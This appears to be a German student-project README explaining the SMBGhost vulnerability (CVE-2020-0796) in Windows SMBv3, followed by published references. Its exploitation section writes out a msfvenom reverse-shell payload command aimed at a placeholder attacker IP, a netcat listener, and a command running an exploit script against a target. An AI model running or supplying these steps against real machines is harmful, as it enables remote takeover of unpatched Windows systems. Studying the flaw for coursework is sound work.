CVE-2020-0796
Erklärung und Recherche zu der Sicherheitslücke für das Semesterprojekt CENG325 für Anfänger
Wie ausnutzen?
Generierung der Nutzlast für Reverse Shell:
msfvenom -a x64 --platform windows -p windows/x64/shell_reverse_tcp LHOST=<ANGREIFER_IP> LPORT=5555 -f python
Port abhören:
nc -lvnp 5555
Exploit-Code ausführen:
python3 exploit.py -ip ZIEL_IP
PoC-Repos
Referenzen
- CVE-2020-0796: „Wurmfähige“ Schwachstelle zur Remote-Codeausführung in.(2020, 13. März). Tenable®. https://www.tenable.com/blog/cve-2020-0796-wormable-remote-code-execution-vulnerability-in-microsoft-server-message-block
- „Ich werde deinen Körper fragen“: SMBGhost Pre-Auth RCE unter Missbrauch von Direct Memory Access-Strukturen. (2020, 20. April). Ricercasecurtiy.Blogspot.https://ricercasecurity.blogspot.com/2020/04/ill-ask-your-body-smbghost-pre-auth-rce.html
- CVE-2020-0796 Speicherkorruptions-Schwachstelle im Windows 10 SMB-Server | FortiGuard Labs. (2020, 12. März). Fortinet Blog.
https://www.fortinet.com/blog/threat-research/cve-2020-0796-memory-corruption-vulnerability-in-windows-10-smb-server
- Team, K. (2020, 2. April). CVE-2020–0796 Windows SMBv3 LPE Exploit POC Analyse. Medium.https://medium.com/@knownsec404team/cve-2020-0796-windows-smbv3-lpe-exploit-poc-analysis-c77569124c87
- CVE-2020-0796 –.(2020). Cyber Threat Insider Blog.https://blog.sensecy.com/tag/cve-2020-0796/
Projektmitglieder